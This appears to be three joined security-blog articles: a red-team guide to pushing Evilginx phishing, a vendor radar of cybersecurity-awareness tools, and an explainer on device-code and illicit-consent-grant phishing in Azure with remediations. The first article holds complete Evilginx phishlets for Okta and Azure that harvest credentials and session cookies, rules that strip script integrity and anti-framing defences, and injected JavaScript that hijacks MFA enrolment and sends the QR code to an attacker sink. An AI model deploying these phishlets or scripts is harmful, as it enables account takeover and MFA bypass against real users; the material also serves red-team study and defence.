Usually, threat actors try to send malicious documents such as HTA applications or malicious Office documents but, with the growth of SMTP security solutions such as ProofPoint, the default Office hardening related to macros and the rise of awareness about phishing, these types of techniques are less and less used.

Today, threat actors do not perform phishing to get a direct initial access to the company network, but to retrieve the digital identity of a user: its Office365/GoogleWorkspace/Okta identity. They then reuse this identity through SSO applications until they find a way to breach the internal network through exposed applications such as Citrix or VPN.

To limit such attacks, companies started enforcing MFA to ensure that even if a threat actor successfully retrieves a valid set of user credentials through phishing or harvesting, he won’t be able to complete the authentication process or reuse them on a different application.

Phishing 101

IDP, cookies and phishing

The MFA protection implemented by companies is a good way to limit the impact of successful phishing. Indeed, even if the threat actor retrieves the user credentials, he won’t be able to spoof the user’s identity as he won’t be able to validate the MFA.

However, today the MFA is usually only asked during the first authentication: once the user is authenticated on the identity provider, it gives him a proof of authentication the user can forward to any service. With this proof of authentication, the user does not need any additional active authentication, therefore not needing to re-validate the MFA as long as the ticket is valid.

In the most common web IDPs such as Azure, Google or Okta, this ticket is represented by the cookies. When the user connects to the IDP for the first time, the service sends back a cookie that is valid for 1 hour, 1 day or 2 years. With these cookies, the user can connect to any other SSO-compliant web service without authentication.

In a nutshell, the user IDP cookies represent the user digital identity. Therefore, in a phishing attack whose primary goal is to spoof the user digital identity, the attacker will try to steal the cookies once the user has successfully performed his authentication.

Evilginx

Evil proxy

In order to steal the cookies, the attacker must be placed in a man-in-the-middle position during the authentication process. However, with TLS security enforced in the majority of IDP, the user will be aware that something wrong is happening.

That’s where Evilginx comes into play. Instead of performing a simple man-in-the-middle attack by relaying the packet to the IDP, Evilginx will create a malicious proxy: the user does not authenticate on accounts.google.com, but he will authenticate to login.evilginx.com:

I will not take more time to develop the evil-proxy principle as it is already well documented on the internet.

Phislets 101

For example, during the authentication to Azure, the following domains are used:

• login.microsoftonline.com
• www.microsoftonline.com
• aadcdn.microsoftonline.com

The problem is that during the authentication flow, the IDP will redirect the user to specific pages with the domain hardcoded in the response. For example, during a classic SAML authentication flow, the IDP will force the client to perform a POST request to a specific hardcoded domain. Therefore, even if the user started its authentication process on login.evilginx.com, during the authentication flow he will be redirected to login.microsoftonline.com breaking the man-in-the-middle position.

Evilginx uses specific configuration files known as phishlets to handle such cases. The phishlet configuration will allow Evilginx to know what domain must be re-written in the server response. So if the IDP sends back a response such as:

<form id=”SAML” action=”https://login.microsoftonline.com”>
[…]
</form>
<script>
document.getElementById(“SAML”).click()
</script>

With the phishlet, Evilginx will know that the domain login.microsoftonline.com must be rewritten and will send back to the target the following modified page:

<form id=”SAML” action=”https://login.evilginx.com”>
[…]
</form>
<script>
document.getElementById(“SAML”).click()
</script>

With such match and replace pattern, Evilginx is able to trap the user inside the malicious application even if the IDP tries to redirect the user to a specific page.

Auto-replace limits

The Evilginx phishlet auto-replace has its limits. Indeed, sometime the server does not directly hardcode the domain in the page but builds it through a JS script.

In this case, Evilginx is not able to automatically detect the domain pattern. As phishlet designers, we need then to understand how the script is working and manually replace the part building the redirection domain through a match/replace.

CORS

In Okta, authentication flow is based on several JS scripts fetched from the oktadcn domain. The script dynamically builds the redirection URL: it takes the Okta tenant name and appends ‘okta.com’. Therefore, when Okta tries to reach the specific page using the okta.com domain, it fails due to CORS protection (trying to reach okta.com/idp/idx/introspect from evilginx.com):

By debugging the application, it is possible to find where the URL building is done and modify it through a match and replace:

Replace: array");var t=
By: array");e.redirectUri=e.redirectUri.replace("okta.com","evilginx.com");var t=

With this simple indication, Evilginx will apply the match and replace on-the-fly, avoiding the redirection of the user outside of the phishing application.

JS integrity

When modifying the JS file or any other file through Evilginx, it can cause troubles due to the script integrity hash:

<script src="https://ok14static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.30.1/js/okta-sign-in.min.js" type="text/javascript" integrity="sha384-EX0iPfWYp6dfAnJ+ert/KRhXwMapYJdnU2i5BbbeOhWyX0qyI4rMkxKKl8N5pXNI" crossorigin="anonymous"/>

Indeed, if Evilginx modifies the okta-signing-widget script, its hash will not match the one set on the html file and the application will refuse to load it.

But, with Evilginx, we can also modify the html page to remove the integrity check:

Replace: integrity="[^"]*"
By: integrity=''

Redirect URI validation

The last point is the Redirect URI validation. Indeed, when doing OIDC authentication, the client will be redirected to a page with a URL like:

/oauth2/v1/authorize?client_id=XXXXXX&redirect_uri=https://trial-xxxxx.okta.com[...]

With the automatic domain replacement configured on Evilginx, the redirect URI parameter trial-xxxxx.okta.com will be automatically changed into trial-xxxxx.evilginx.com.

This will trigger the redirect uri validation process and because the evilginx.com domain has not been configured on the Okta end as a valid redirection domain, Okta will show the following error:

The redirect URI is dynamically built by Okta by taking the login domain and adding the callback parameters. It is then possible to bypass this error by modifying the JS script building the URL and ensure that the callback URI is the one expected by Okta:

Using Evilginx, it is possible to use the match/replace pattern to reset the redirect_uri to the right URI:

Replace: ,l.src=e.getIssuerOrigin()
By: ,l.src=e.getIssuerOrigin().replace("evilginx.com","okta.com")

Replace: var s=(n.g.fetch||h())(t
By: ,l.src=e.getIssuerOrigin().replace("evilginx.com","okta.com")

Basic phishlets

Okta

min_ver: '3.0.0'
name: 'okta-wavestone'

params:
  - name: okta_orga
    default: ''
    required: true
  - name: redirect_server
    default: https://google.com

proxy_hosts:
  - phish_sub: '{okta_orga}'
    orig_sub: '{okta_orga}'
    domain: okta.com
    session: true
    is_landing: true
    auto_filter: true

  - phish_sub: ok14static
    orig_sub: ok14static
    domain: oktacdn.com
    session: false
    is_landing: false
    auto_filter: true

  - phish_sub: login
    orig_sub: login
    domain: okta.com
    session: false
    is_landing: false
    auto_filter: true

sub_filters:
  - triggers_on: 'ok14static.oktacdn.com'
    orig_sub: ''
    domain: 'okta.com'
    search: 'array"\);var t='
    replace: 'array");e.redirectUri=e.redirectUri.replace("{basedomain}","{orig_domain}");var t='
    mimes: ['application/javascript']

  - triggers_on: '{okta_orga}.okta.com'
    orig_sub: ''
    domain: 'okta.com'
    search: integrity="[^"]*"
    replace: integrity=''
    mimes: ['text/html', 'charset=utf-8']

  - triggers_on: '{okta_orga}.okta.com'
    orig_sub: ''
    domain: 'okta.com'
    search: 'mainScript\.integrity'
    replace: 'mainScript.inteegrity'
    mimes: ['text/html', 'charset=utf-8']

  - triggers_on: 'ok14static.oktacdn.com'
    orig_sub: ''
    domain: 'okta.com'
    search: 'var s=\(n\.g\.fetch\|\|h\(\)\)\(t'
    replace: 't=t.replace("{orig_domain}","{domain}");var s=(n.g.fetch||h())(t'
    mimes: ['application/javascript']

  - triggers_on: 'ok14static.oktacdn.com'
    orig_sub: ''
    domain: 'okta.com'
    search: ',l\.src=e\.getIssuerOrigin\(\)'
    replace: ',l.src=e.getIssuerOrigin().replace("{orig_domain}","{domain}")'
    mimes: ['application/javascript']

  - triggers_on: 'ok9static.oktacdn.com'
    orig_sub: ''
    domain: 'okta.com'
    search: ',l\.src=e\.getIssuerOrigin\(\)'
    replace: ',l.src=e.getIssuerOrigin().replace("{orig_domain}","{domain}")'
    mimes: ['application/javascript']

auth_tokens:
  - domain: '{okta_orga}.okta.com'
    keys: ['idx:always']

credentials:
  username:
    key: ''
    search: '"identifier":"([^"]*)"'
    type: 'json'

  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'

login:
  domain: '{okta_orga}.okta.com'
  path: '/'

force_post:
  - path: '/kmsi'
    search:
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'

Azure

name: 'o365-wavestone'
min_ver: '3.0.0'

proxy_hosts:
  - phish_sub: 'login'
    orig_sub: 'login'
    domain: 'microsoftonline.com'
    session: true
    is_landing: true

  - phish_sub: 'www'
    orig_sub: 'www'
    domain: 'office.com'
    session: true
    is_landing:false

  - phish_sub: 'aadcdn'
    orig_sub: 'aadcdn'
    domain: 'msftauth.net'
    session: false
    auto_filter: true
    is_landing:false

auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
  - domain: 'login.microsoftonline.com'
    keys: ['SignInStateCookie']

credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'

auth_urls:
  - '/common/SAS/ProcessAuth'
  - '/kmsi'

login:
  domain: 'login.microsoftonline.com'
  path: '/'

force_post:
  - path: '/kmsi'
    search:
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/common/SAS'
    search:
      - {key: 'rememberMFA', search: '.*'}
    force:
      - {key: 'rememberMFA', value: 'true'}
    type: 'post'

Automate critical actions

Adding MFA device

Once an attacker is able to retrieve an initial access to the user session, he needs to add access persistence as the cookies have a limited validity timeframe.

This is usually done by adding an additional MFA device to the user account.

For example, on Azure, adding an MFA device does not ask for user reauthentication or MFA validation. So, as long as the attacker has access to the user session, he is able to directly register his malicious MFA device.

However, on some IDP such as Okta, the MFA registration asks for an MFA validation. So even if the attacker successfully has compromised the user’s Okta session, he won’t be able to directly add a MFA.

What could be interesting is to add this reauthentication step during the phishing attack:

1. The user authenticates a first time to access his session
2. Evilginx steals the user cookies
3. Evilginx performs automatic API calls to trigger the MFA device registration authentication in the backgroup
4. The user revalidates his MFA thinking the first one failed
5. Evilginx intercepts the MFA QRCode allowing the attacker to finalize the MFA registration process

All these actions can be automated through Evilginx by modifying the JS scripts.

First, Evilginx will intercept the redirection performed at the end of the first authentication and redirect the user to a fake controlled page:

  - trigger_domains: ['{okta_orga}.okta.com']
    trigger_paths: ['/app/UserHome']
    script: |
      if(document.referrer.indexOf('/enduser/callback') != -1){document.location = 'https://'+window.location.hostname+'/help/login'}

This script will be injected only in the /app/UserHome page and be triggered only when the page is accessed from the /enduser/callback page. It ensures that the user is redirected to the decoy page only when the first authentication flow is finished. In this case the decoy page is the okta /help/login page. This redirection to a decoy page is mandatory otherwise the user is blocked in a infinite redirection loop at the end of his authentication flow…

Then, a new JS code is added to the /help/login page. This script is used to enumerate the available MFA technologies available and configured:

  - trigger_domains: ['{okta_orga}.okta.com']
    trigger_paths: ['/help/login']
    script: |
      function u4tyd783z(){
        fetch('/api/v1/authenticators')
        .then((data) => {
            data.json().then((jData)=>{
                let id = undefined
                for(let elt of jData){
                    if(elt.key == 'okta_verify'){
                        id = elt.id
                    }
                }
                if(id == undefined){
                    return
                }
                console.log('https://'+window.location.hostname+'/idp/authenticators/setup/'+id)
                document.location = 'https://'+window.location.hostname+'/idp/authenticators/setup/'+id
            })
        })
      }
      u4tyd783z();

The script chooses the Okta Verify authentication method and redirects the user to the setup page.

On the setup page, a new JS script is injected. This JS script is used to automate the registration steps to only let the MFA validation form:

- trigger_domains: ['{okta_orga}.okta.com']
    trigger_paths: ['/idp/authenticators/setup/.*']
    script: |
      function u720dhfn2(){
        if(document.querySelectorAll('.button.select-factor.link-button').length > 0){
            document.querySelectorAll('.button.select-factor.link-button')[0].click()
            document.querySelectorAll('body')[0].style.display = 'none'
            a = true
        }
        if(document.querySelectorAll('a.orOnMobileLink').length > 0){
            document.querySelectorAll('a.orOnMobileLink')[0].click()
            b = true
        }
        if(document.querySelectorAll('img.qrcode').length > 0){
            fetch("{qrcode_sink}", {
              method: 'POST',
              body: JSON.stringify({code: document.querySelectorAll('img.qrcode')[0].getAttribute('src')})
            }).then(()=>{
              document.location='{redirect_server}'
            }).catch(()=>{
              document.location='{redirect_server}'
            })
            clearInterval(myInterval)
        }
      }
      var a = false
      var b = false
      var myInterval = setInterval(function(){u720dhfn2()}, 10)

Once the user has validated the MFA authentication, the script will locate the QRCode displayed in the page and exfiltrate it through HTTP.

The attacker can then retrieve the QRCode and enroll his own device.

Pushing the limit

Okta with Azure authentication

Some companies can link two IDP together: Okta redirects to Azure and provisions the user when they first login.

In this case it is interesting for an attacker because he will be able to retrieve Azure and Okta session in one phishing.

The previous phislets must be merged in order to capture both authentications. The important point is to ensure that Okta will redirect to the Azure Evilginx and not to the login.microsoftonline.com website.

Hopefully, the redirection is made with a plaintext form in the Okta response with an auto-submit HTML form:

<form id="appForm" action="https://login.microsoftonline.com/7ee59529-c0a4-4d72-82e4-3ec0952b49f4/saml2" method="POST">[...]</form>

Because the Azure domain is hardcoded directly on the HTML, Evilginx will be able to automatically switch the real domain by the phishing domain.

Likewise, for the redirection from Microsoft to Okta once the authentication flow ends, Evilginx will also be able to automatically swap the Okta domain by the Okta Evilginx domain allowing the retrieval of the Azure session cookie.

In a nutshell, in this specific case, it is possible to simply merge the two previous phishlets.

Frame buster

More and more users will look at the authentication URL before inputting their credentials. In order to prevent such detection, it is possible to use a Browser in browser technique.

The idea is to embed the phishing application into an iFrame and create a Chrome lookalike frame around the iframe in order to make the iframe appear as a popup.

Because we are redesigning the while popup, it is possible to display a wrong address. In the following figure, the Google form is embedded in an iframe but look like a real popup:

The main problem here is that the majority of IDP authentication forms implements several techniques to avoid being embedded in an iframe. These techniques are called framebuster.

While Okta does not seem to implement such techniques, the Azure authentication form contains a lot of features that would break if embedded in an iframe.

Self == top

The simplest framebuster technique is to check if the current frame is the top frame, which Microsoft implements. If it detects that the authentication form is not the top frame, it does not display the form.

With Evilginx, it is possible to remove the check with a simple match and replace pattern:

Replace: if(e.self===e.top){
By: if(true){window.oldself=e.self;e.self=e.top;

This modification ensures that the iframe is recognized as the top frame.

Target=”_top”

The next technique consists in forcing the form submit to redirect the top frame. Therefore, if the form is submitted in an iframe, it will not only redirect the iframe, it will redirect the whole page, breaking the Browser-in-browser.

This can be done by adding the target=”_top” attribute in the form. It is then possible to remove this protection with Evilginx:

Replace: method="post" target="_top"
By: method="post"

Framework specific

Microsoft uses a specific framework for their application. The framework does not embed framebusting technique per say, but its internal functioning makes it quite complicated to embed in an iframe.

The limitation is that at a specific moment, the framework tries to post to a specific URL that is built up using the top frame domain. So instead of posting the data to login.evilginx.com, it will post it to my-phishing-app.com which will fully break the authentication process.

In order to change this address, it is not possible to simply swap the domain with the phishing domain as it was previously done in the previous part. We need to understand how the framework works to change the value manually in the root element:

Replace: autoSubmit: forceSubmit, attr: { action: postUrl }
By: autoSubmit: forceSubmit, attr: { action: \\'/common/login\\'}

HTTP header

The last framebusting technique is related to the HTTP header X-Frame-Options: DENY that indicate to the browser that the application cannot be displayed in an iFrame.

It is possible to simply remove this header with Evilginx:

Replace: X-Frame-Options: DENY
By: Test: Test

Final phishlet

The following video shows an example of browser in browser phishing on a company using Okta/Azure. The attacker will be able, in a single phishing to:

• Retrieve the Azure credentials
• Retrieve the Azure cookies
• Retrieve the Okta cookies
• Retrieve the MFA enrollment QRCode for Okta

Example of browser in browser phishing on a company using Okta/Azure

The evolution of phishing techniques, exemplified by tools like Evilginx, underscores a critical shift in cyber threats—from merely capturing credentials to hijacking entire authenticated sessions. By acting as an adversary-in-the-middle (AiTM), Evilginx can intercept and manipulate traffic between users and legitimate services, effectively bypassing traditional Multi-Factor Authentication (MFA) mechanisms.

But this is only the tip of the iceberg. Indeed, Evilginx can be used and customized to automate specific critical actions such as MFA registration, to bypass specific securities such as framebuster, ensuring that the attacker will get persistent access to the user session.

The only way to limit phishing attacks is to deploy phishing resistant MFA such as FIDO keys for at least the administrators.

Cet article Phishing: Pushing Evilginx to its limit est apparu en premier sur RiskInsight.

However, although companies recognize the importance of awareness content, very few manage to effectively deploy solutions adapted to their teams’ specific needs. In fact, as much as awareness is a priority, choosing the most suitable tool remains a challenge. Companies are confronted to a diverse range of options, from standardized online training to interactive and personalized tools.

A radar of +100 cybersecurity awareness solutions

In an environment where cybersecurity awareness is becoming a priority, the awareness solutions radar proves to be a strategic ally for companies. This tool provides a clear and structured view of available solutions, helping organizations identify the ones best suited to their needs.

A decision-making tool

The radar provides a comprehensive overview of options available and helps assess the size of the market. Thanks to the radar, companies can quickly identify high-performing and innovative solutions, while also distinguishing essential ones. To achieve this, the solutions have been grouped into 7 categories:

1. Maturity Assessment: Solutions offering robust cybersecurity maturity and human risk evaluation tools, going beyond reports or questionnaires
2. E-learning: Solutions providing a variety of structured learning modules
3. Technical Training: Solutions specifically designed for technical audiences (cybersecurity teams, IT, developers, etc.)
4. AI: Solutions based on artificial intelligence tools
5. Chatbot: Solutions integrating an interactive conversational agent
6. Phishing: Solutions specialized in phishing attack simulations, distinct from e-learning modules covering the topic.
7. Games: Solutions focused on gamification, offering engaging cybersecurity awareness activities.

This radar aims to provide a condensed view of our benchmark and is not a ranking. It is a curated selection based on several criteria, including company size, market presence (primarily in France), and our expert evaluation. We have intentionally limited the number of solutions presented to ensure a clear and strategic overview.

The selection favors French solutions, in line with our client base, while also including a few relevant international players. Additionally, only solutions whose core offer is product-oriented, rather than consulting services, have been included, to ensure a product-focused approach.

A benchmark for a tailored solution

The radar is based on a benchmark of over +100 solutions available on the market, providing a comprehensive overview of the cybersecurity awareness solutions’ ecosystem.

The benchmark is designed to guide your selection towards the most suitable solution. Companies fill in their criteria to generate a refined list of options: types of content (phishing, passwords, social engineering, etc.), types of formats (quizzes, videos, chatbot, e-learning, etc.), availability and flexibility of the solution, target population, price, languages, etc. This process helps avoid arbitrary choices and ensures the selection of a solution that is truly aligned with awareness challenges and objectives.

Thus, without trying to be exhaustive, the radar offers a wide range of options to best meet your organization’s needs.

Integration process into the benchmark

The process of integrating a solution into the benchmark is intended to be straightforward. Once a solution is identified, it is analyzed and sorted based on specific criteria, along with feedbacks from our Wavestone consultants. In addition, meetings with solution providers allow us to refine our analysis through demonstrations and the collection of additional information.

As such, a solution with a clear and intuitive interface, offering transcriptions in multiple languages, and covering a wide range of topics (phishing, cloud, chatbot, etc.) in an innovative way will be particularly relevant. If it also receives positive feedback from our consultants, it will have a strong chance of being included in the radar.

The benchmark and its radar also come with detailed presentations of certain solutions. Thanks to our expertise and strong convictions regarding awareness, some solutions deemed relevant have detailed profiles that include a more precise overview of the interface and expert opinions, enriched by discussions with vendors. These presentations not only help select the most suitable tool but also highlight often more effective yet lesser-known alternatives.

Integration process of a solution into the benchmark and radar

Disclaimer

Please note that this radar is a reduced view of the associated benchmark. If you notice that a cyber awareness player you know is missing from this radar, contact us so we can evaluate and add them.

Acknowledgements

We would like to thank Guillaume MASSEBOEUF for his contribution to this radar.

Cet article 2025 cybersecurity awareness solutions radar: how can I find the right solution for my needs? est apparu en premier sur RiskInsight.

Phishing attacks are well known. The objective of this type of attack is to perform actions from a victim’s account or to retrieve information about the targeted person or company.

Despite their notoriety, they remain very effective for attackers. Indeed, among the attacks investigated by Wavestone CERT, about 51% of them start with the use of valid accounts, which includes phishing attacks.

We are all vulnerable to phishing attacks! An attacker with enough resources and information about their target can generate a trap sophisticated enough to trick them. Similarly, the Office365 and Azure product suites have features that can be exploited in less conventional attacks, the impacts of which users may not be aware.

Employee awareness, while necessary to address the most common threats, is not enough to address some of the more targeted or less traditional types of attacks. Tougher access requirements to cloud-hosted resources, good hygiene in managing access rights, and detection of unusual and suspicious access are all critical to a company’s defence strategy.

Attackers have a wide range of tools and possibilities to access documents stored on a company’s SharePoint, attempt to retrieve sensitive emails, or retrieve employee information. The traditional phishing attack as well as the device code authentication attack will be briefly explained below before looking at the illicit consent grant attacks in more detail.

The traditional phishing attack: a known threat preventable using multi-factor authentication

Traditional phishing attacks are usually based on sending a link directing the targeted victims to a site the attacker controls. Using an authentication login page similar to those used by employees of the targeted company, the attacker retrieves the credentials and passwords of the tricked users.

The traditional phishing attack is simple to implement in the absence of multi-factor authentication

The ease of implementing such an attack on a large scale makes it a tool of choice for untargeted attacks. One method to protect against this type of attack is to enforce the use of a second authentication factor.

It should be noted however that although more complex to implement, the interception of the second authentication factor is technically feasible and will be the subject of an upcoming dedicated article.

The attack via “device code” authentication: a little-known authentication method hijacked by attackers

This attack relies on the device authorization grant functionality[1]. This authentication method allows the authentication of a user on a device without a web browser. A code displayed on this device must then be entered on a computer or smartphone via the dedicated Microsoft site. This device will then have part of the access rights to Office 365 resources corresponding to the user who entered the code.

This functionality is not well known to users and can be exploited by an attacker for malicious purposes:

• The attacker first generates a device code, using the same process used by devices without a web browser.
• Then, the attacker’s objective will be to get the victim to fill in his device code on the https://microsoft.com/devicelogin For example, the attacker could pretend that to access a sensitive document, it is necessary to connect to this link using the code he generated.
• If the target accesses the link, fills in the code and authenticates, this will allow the attacker to impersonate the

Example of a device code phishing attack

This attack is more difficult for an attacker to carry out because of the short lifespan of the device codes: they are only valid for 15 minutes and must therefore be generated shortly before the user enters them. This attack is therefore more easily carried out within the framework of “phoning” attacks or phishing via Teams. For example, the attacker could call the victim, pretending to be part of the company’s IT support team, and ask the user to authenticate on the link indicated and fill in the code of his choice.

To protect against this type of attack, conditional access policies on Azure can be used to prohibit suspicious connections from devices not under the control of the company.

Illicit consent grant attack

In addition to these two methods, the illicit consent grant attack also allows an attacker to illegitimately gain access to an Azure environment. This attack was even initially easier for an attacker to implement than attacks via device code authentication. Faced with the resurgence of this threat, actions were taken in 2020 by Microsoft to limit the conditions for carrying out the attack. While hardened Azure configurations can completely block this threat, the configurations implemented by some companies expose them to this type of attack. What are the prerequisites for the realization of such an attack, what are the possible consequences and how to protect yourself?

What is the illicit consent grant attack?

To understand the principle of this attack, let’s put ourselves in the shoes of an employee who is a victim of such an attack:

• The victim receives a phishing email indicating an urgent action to be taken to keep their Microsoft account activated. Employees are made aware not to click on phishing links and not to enter their passwords on unknown platforms. The link in the format https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=<CLIENT_ID>&redirect_uri=<Attacker_controled_URL>&response_type=code&response_mode=query&scope=Mail.ReadWrite%20Files.Read.All%20Mail.Send%20User.Read contains a Microsoft-associated domain, which reassures the victim.
• When clicking on the link, the victim must authenticate themself. This authentication is often automatic since it benefits from Microsoft’s single sign-on (SSO). The victim then receives a request to grant permissions:

The malicious application asks the user to grant it permissions

• If the victim clicks “Cancel” out of caution, they are redirected to the attacker’s server with a URL like <Attacker_controled_URL>/?error=consent_required &error_description=AADSTS65004%3a+User+declined+to+consent+to+access+the+app.&error_uri=https%3a%2f%2flogin.microsoftonline.com%2ferror%3fcode%3d65004#. The attacker, understanding that the victim has not accepted the prompt to grant them permissions, can then redirect the victim to the phishing page, giving them the impression that the requested permissions must be accepted to proceed to the next step.
• Because of the legitimate domain name and the urgency indicated in the phishing email, the victim of the attack chooses to accept. They then see a message indicating that their account will be kept activated, as suggested in the initial email. The victim then resumes normal activity.

However, this consent allows the attacker to perform actions on behalf of the victim, depending on the permissions granted. Note that the illicit consent grant attack has many advantages for an attacker, including:

• The use of a Microsoft-associated URL when requesting consent, which is considered trusted and therefore implies less distrust on the part of targeted users.
• Obtaining persistent access for 90 days, without knowledge of the user’s password or second authentication factor if no conditional access policy is implemented.
• The ability to directly request Microsoft APIs to automatically retrieve files, emails, and other corporate resources accessible by the tricked user.

Technical sidebar

From a technical point of view, the illicit consent grant attack relies on the ability of an attacker to create an application that requires permission to be granted. Granting the permission is a feature that is regularly used by users without them realizing it, e.g., the Outlook client is allowed by default to retrieve and notify them of new incoming emails.

Here are the key steps when performing this type of attack (which is based on the authorization code grant flow of OAuth 2.0):

• The attacker creates an enterprise application on Azure AD (application registration), configures the permissions they want from users and instantiates a “client_secret” on the application. Some constraints related to this application are detailed below.
• The attacker sets up a server to which users will be redirected following the consent and indication of its URL as a valid redirection URL for the application.
• Following a user’s consent, the user will be redirected to the malicious site and a code will be provided to the attacker. This code is the proof to be shown to Microsoft that the user authorizes the application to do actions on their behalf.
• Using this code and the application’s “client_secret“, the attacker will be able to retrieve an OAuth token. This token is a receipt signed by Microsoft that specifies the actions that the victim authorizes to be done on his behalf. The attacker can also retrieve a “refresh_token” that allows to renewal of the validity of the OAuth token.
• This OAuth token can then be used to send requests to the Graph API in the name of the victim and therefore allows attackers to impersonate the user.

What are the consequences of such an attack?

While some permissions require administrator approval by default, other permissions can be granted directly by users in non-hardened Azure environments. The permissions that can be recovered by the attacker during this type of attack depend on the configuration of the targeted Azure AD tenant.

Here are some examples of possible abuse by an attacker who has managed to retrieve a user’s permissions on a non-hardened environment.

Actions that can be taken following a successful malicious consent attack on an unhardened Azure environment

• Azure Active Directory:
  • The Microsoft Graph User.ReadBasic.All permission allows retrieval of the email addresses of all users in a tenant, allowing the deployment of larger-scale phishing attacks from an initial compromise.
• Outlook:
  • Sending an email on behalf of a user can enable so-called “president fraud” attacks using the Microsoft Graph Mail.Send and Mail.ReadWrite permissions. A compromised employee with a high level of authority could, for example, send an email requesting that a large amount of money be sent urgently to a bank account not listed by the company.
  • Sent emails can also be hidden using Outlook filtering rules that can be modified using the MailboxSettings.ReadWrite permission. The attacker will then be able to redirect all emails related to his attack and associated replies to a different folder in the outbox and inbox.
• Teams:
  • Reading and sending messages via Teams (Microsoft Graph Chat.ReadWrite) is an effective method for an attacker to impersonate a user. This method can also be used to carry out “president fraud” attacks.
• OneDrive and SharePoint:
  • Read access to files accessible on OneDrive and SharePoint (Microsoft Graph Files.Read.All) can provide access to all files accessible by the user. In addition, SharePoint files are often stored with permissive access rights which could allow attackers to retrieve a large number of files. It is not uncommon, for example, to have access to scripts or configuration files containing passwords in clear text.
  • In addition, SharePoint’s search capabilities, including reading and indexing the content of Office files, can be used to target certain keywords such as “password”.
  • The writing rights on a SharePoint file (Microsoft Graph Files.ReadWrite.All) can also have a significant impact: SharePoint’s versioning features limit the recording of old file versions to 100 versions by default. This means that in case of automated and successive rewrites more than 100 times, the initial version of the file would no longer be recoverable. This would allow an attacker to erase a large amount of data if an account with write rights to sensitive files is compromised. In case of deletion, it would then be necessary to contact Microsoft support to try to recover the data from the daily cold backups.
• OneNote:
  • Synchronized OneNote files (Microsoft Graph Notes.ReadWrite or Notes.Read.All) can contain sensitive information such as meeting minutes, and confidential information, but also technical information such as passwords stored in an unsecured manner.
• Azure Resources:
  • Access to key vaults and storage accounts (Azure Key Vault and Azure Storage user_impersonation) can give access to sensitive elements in case of compromise of developer or technical user accounts. These elements can facilitate the compromise of Azure resources such as virtual machines and serve as a rebound point for an external attacker.

These actions can have serious impacts on a company. In addition, they can facilitate more elaborate attacks by disclosing sensitive information to an external attacker.

If approved by an administrator, more sensitive permissions can be retrieved such as write access to all Azure Active Directory information.

Finally, administrators have the right to grant all users permission to an application of the tenant. In this case, the identity of all users could be impersonated to grant permission.

Microsoft’s implementation of the “risk-based consent step-up” to limit attacks by illicit consent

In response to this threat, Microsoft implemented additional protections in November 2020 to limit the impact of this type of attack. The “risk-based consent step-up” feature aims to raise a warning and ask for an administrator’s validation in case of a permission request that seems fraudulent.

The access request from an unverified application considered sensitive is blocked by default

This applies in the case of a permission request by an unverified application created outside the targeted tenant. By default, all permissions are affected, except for reading the target user’s profile, to facilitate single sign-on (SSO) with third-party applications.

This restriction is implemented by default on all Azure tenants.

Although these restrictions limit attacks, 3 types of applications can still be used for malicious purposes: legacy applications, applications internal to the targeted tenant and verified applications.

• Legacy applications:
  • To allow for backward compatibility, no warning message is displayed for a permission request from an application created before November 2020.
  • Prerequisite for the attacker: have an application created on an Azure tenant before November 2020 or compromise a tenant containing such applications.
• Internal applications of the targeted tenant:
  • These applications are not covered by the “risk-based consent step-up”. By default, all users of an Azure tenant have the right to create an enterprise application on their tenant, which makes it easier to attack an unhardened environment.
  • Prerequisites for the attacker: to have a first compromised account on the IS of the targeted company, to realize that the creation of applications is authorized for standard users and to deploy an internal application to the tenant.
• Verified applications:
  • Verified applications are not covered by the risk-based consent step-up. The Microsoft verification process requires integration into the Microsoft Partner Network.
  • Prerequisite for the attacker: have a verified application or compromise an Azure tenant with verified applications and hijack the use of these legitimate applications.

Possible remediations

To limit the probability and impact of such attacks, the following recommendations can be applied and adapted to the company’s context:

• Allow only applications explicitly approved by administrators. This configuration is the most secure, but the validation step can be a bottleneck since it is usually the Global Administrators and Privileged Role Administrators who must give validation. In practice, some rights can also be granted via Cloud Application Administrators or Application Administrators.

Granting privilege consent by standard users can be blocked via Azure AD configurations

• Limit the permissions which can be granted. An administrator can specify Low-risk permissions that can be granted directly by users.

Granting privilege consent by standard users can be limited to rights considered non-sensitive via Azure AD configurations

• Create a legitimate application validation process and admin consent workflow to track and justify these validations. By tightening up the consent process, it is necessary to jointly implement a simple and intuitive way for users to request exceptions to grant permissions related to legitimate use cases. These exceptions must be tracked and justified to ensure the legitimacy of the requests.
• Regularly review the rights granted to applications (Enterprise applications): permissions granted by users should be reviewed to ensure that only legitimate applications have rights to the tenant’s Office 365 resources.

Regular review of trusted applications on an Azure tenant facilitates checking that the privileges granted are still valid

• Monitor suspicious access to Office 365 resources. For example, it is possible to set up alert rules on the number of files downloaded over a short period of time to identify data exfiltration attempts.
• Limit access rights to SharePoint files to what is strictly necessary: files that are accessible to all users within a company should be checked at regular intervals and access rights to the most sensitive files should be reviewed to ensure that only the necessary people have access.

Conclusion

The various phishing attacks presented in this article are based on a lack of hardening of Azure AD configurations. The implementation of a second authentication factor, while necessary for traditional phishing attacks, is not sufficient to protect against the other attacks presented. For attacks via device code authentication, administrators can implement conditional access policies to limit suspicious connections from devices not under the control of the organization. For illicit consent grant attacks, the most effective measure is to only allow applications approved by administrators.

These three elements of hardening, although simple in appearance, can be the subject of real security projects to consider the existing configurations and usages, in particular by ensuring that existing applications are not blocked by these measures, and by implementing regular review and validation processes for new applications.

Bibliography

https://aadinternals.com/post/phishing/

https://jeffreyappel.nl/protect-against-oauth-consent-phishing-attempts-illicit-consent-attack/

https://positivethinking.tech/insights/what-is-an-illicit-consent-grant-attack-in-office-365/

https://docs.microsoft.com/en-us/azure/active-directory/develop/publisher-verification-overview

https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/user-admin-consent-overview

https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-app-consent

https://www.microsoft.com/en-us/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/

